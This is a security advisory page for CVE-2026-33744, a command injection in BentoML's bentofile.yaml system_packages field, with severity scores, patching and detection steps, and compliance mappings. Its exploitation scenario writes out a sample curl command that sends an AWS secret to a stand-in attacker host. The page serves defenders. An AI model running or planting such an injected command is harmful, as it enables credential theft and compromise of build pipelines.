CVE-2026-33744: BentoML: command injection in bentofile.yaml containerize

GHSA-jfjg-vc52-wqvf HIGH CISA: ATTEND
Published March 27, 2026
CISO Take

Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.

What is the risk?

High risk for organizations with collaborative or automated MLOps pipelines where bentofile.yaml originates from shared repositories, model hubs, or external contributors. Exploitation is trivial — no ML expertise required, just knowledge of shell metacharacters. The local attack vector limits opportunistic internet exposure, but CI/CD systems routinely pull and build from external sources, effectively elevating this to a remote-exploitable scenario in practice. Build-time compromise is particularly dangerous because artifacts (container images) propagate downstream before detection.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
BentoML pip <= 1.4.36 1.4.37
8.7K OpenSSF 6.4 21 dependents Pushed 12d ago 55% patched ~14d to patch Full package profile →

Do you use BentoML? You're affected.

How severe is it?

CVSS 3.1
7.8 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 17% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Local
AC Low
PR None
UI Required
S Unchanged
C High
I High
A High

What should I do?

5 steps
  1. PATCH

    Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents.

  2. AUDIT

    Review all bentofile.yaml files in your repositories for suspicious entries in system_packages — values containing semicolons, ampersands, pipes, backticks, or $() are red flags.

  3. GATE

    Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in system_packages.

  4. ISOLATE

    Run bentoml containerize in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts).

  5. DETECT

    Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2.6 - Information security measures for AI systems A.8.4 - AI system third-party and supply chain
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place for AI supply chain risk management MANAGE 2.2 - Mechanisms are in place to inventory AI systems and their components
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-33744?

Any team running `bentoml containerize` on untrusted or externally-sourced bentofile.yaml files is exposed to arbitrary command execution at build time — a classic supply-chain injection point in MLOps pipelines. Patch to BentoML 1.4.37 immediately and treat bentofile.yaml with the same scrutiny as Dockerfile or CI/CD scripts. If you cannot patch, block unreviewed bentofile.yaml ingestion in your build pipelines.

Is CVE-2026-33744 actively exploited?

No confirmed active exploitation of CVE-2026-33744 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-33744?

1. PATCH: Upgrade BentoML to >=1.4.37 immediately on all build hosts and CI/CD agents. 2. AUDIT: Review all bentofile.yaml files in your repositories for suspicious entries in `system_packages` — values containing semicolons, ampersands, pipes, backticks, or `$()` are red flags. 3. GATE: Add a pre-build lint step (grep/regex) to reject bentofile.yaml with non-alphanumeric characters in `system_packages`. 4. ISOLATE: Run `bentoml containerize` in ephemeral, network-restricted build environments (no cloud metadata endpoint access, no production credential mounts). 5. DETECT: Alert on unexpected outbound connections or file writes during Docker build phases in your SIEM/build logging.

What systems are affected by CVE-2026-33744?

This vulnerability affects the following AI/ML architecture patterns: model serving, MLOps build pipelines, container registries, training pipelines.

What is the CVSS score for CVE-2026-33744?

CVE-2026-33744 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.26%.

What is the AI security impact?

Affected AI Architectures

model servingMLOps build pipelinescontainer registriestraining pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0010.004 Container Registry
AML.T0011 User Execution
AML.T0050 Command and Scripting Interpreter
AML.T0079 Stage Capabilities

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.6.2.6, A.8.4
NIST AI RMF: GOVERN 6.1, MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.37, the `docker.system_packages` field in `bentofile.yaml` accepts arbitrary strings that are interpolated directly into Dockerfile `RUN` commands without sanitization. Since `system_packages` is semantically a list of OS package names (data), users do not expect values to be interpreted as shell commands. A malicious `bentofile.yaml` achieves arbitrary command execution during `bentoml containerize` / `docker build`. Version 1.4.37 fixes the issue.

Exploitation Scenario

A threat actor targeting an ML engineering team submits a pull request to an open-source BentoML model repository, modifying bentofile.yaml to include a malicious system_packages entry such as `curl http://attacker.com/exfil?k=$(cat /run/secrets/aws_key)`. When a developer or CI/CD pipeline runs `bentoml containerize` to build the model's serving container — a routine step before deployment — the injected command executes during the Docker RUN layer, exfiltrating build secrets or installing a persistent backdoor into the resulting container image. The compromised image is then pushed to the container registry and deployed to production model serving infrastructure.

Weaknesses (CWE)

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

  • [Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
  • [Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
March 27, 2026
Last Modified
March 27, 2026
First Seen
March 27, 2026

Related Vulnerabilities